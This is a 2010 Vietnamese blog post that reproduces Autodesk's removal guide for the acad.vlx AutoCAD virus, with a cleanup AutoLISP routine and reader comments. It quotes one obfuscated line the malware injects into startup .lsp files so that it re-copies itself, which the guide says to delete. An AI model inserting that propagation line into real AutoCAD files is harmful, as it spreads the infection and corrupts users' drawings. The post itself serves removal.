Thứ Ba, 7 tháng 12, 2010

acad.vlx

acad.vlx = troj
How to detect and remove the Acad.vlx virus

Issue
Users of AutoCAD-based products have reported a malicious acad.vlx file that causes drawing corruption.
Solution
This is not an actual AutoCAD file provided by Autodesk. When the malicious acad.vlx file is loaded in AutoCAD, it corrupts the drawing, which may result in a Missing Language Pack dialog box displaying when you save and reopen the drawing.
The acad.vlx file creates a copy of itself in the Help folder (for example, C:\Program Files\AutoCAD 20xx\Help\logo.gif). Several other files are also modified and the ACADLSPASDOC system variable is set to 1, allowing the acad.vlx file to be loaded into other opened drawings, thereby corrupting them.
The cleanup process outlined below detects and deletes any acad.vlx file before AutoCAD attempts to load it, preventing the spread of the virus.
To prevent additional file corruptions
You must be a system administrator on your Microsoft® Windows® operating system to complete this process.
In your product installation folder, locate the Support folder (for example, C:\Program Files\AutoCAD 20xx\Support).
In the Support folder, double-click the acad20xx.lsp file (for example, the acad20xx.lsp file). Add the code below to the file. AutoCAD will detect and delete the acad.vlx and logo.gif files.

(defun cleanvirus( / lspfiles lspfile x)
(setq lspfiles '("acad.vlx" "logo.gif"))
(foreach lspfile lspfiles
(while (setq x (findfile lspfile))
(progn
(vl-file-delete x)
(princ "\nDeleted file ")
(princ x)
);progn
);while
);foreach
)
(cleanvirus)

Open each of the following files:
C:\Program Files\AutoCAD 20xx\Express\acetauto.lsp
C:\Program Files\AutoCAD 20xx\Support\ai_utils.lsp
ROAMABLEROOTPREFIX\Support\acad.mnl
Note: Replace ROAMABLEROOTPREFIX with the value returned by the ROAMABLEROOTPREFIX system variable.

If present, delete the following line of code:
(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))

Save each file.

Xem:
http://usa.autodesk.com/adsk/servlet/ps/dl/item?siteID=123112&id=13742026&linkID=9240617

3 nhận xét:

  1. Nặc danh7/12/10

    *Nặc danh "comment" thoải mái nhé,
    đừng nói tục, chửi bậy hoặc những hành vi tương tự là được.

    Trả lờiXóa
  2. Nặc danh17/12/10

    Mới biết đấy. Virus cũng dòm ngó cả ACAD nữa cơ ah? Không biết dòng code nó chèn vào acad.vlx này có tác dụng phá phách sao nhỉ. Ngày xưa có virus acad.lsp những nó chỉ nhân bản file thôi, không phá gì cả. (Antrung)

    Trả lờiXóa
  3. Thx bạn,
    acad.vlx này tớ thấy nó khống chế khá nhiều các thao tác tại command line, có những lúc vài người kêu ca không thể xplode block, xref...
    và bất tiện khi không thể copy/paste cliboard.

    Trả lờiXóa

Đọc giả dùng mã html để tùy chỉnh kiểu chữ bình luận của quý vị như: <b> <i> and <ul>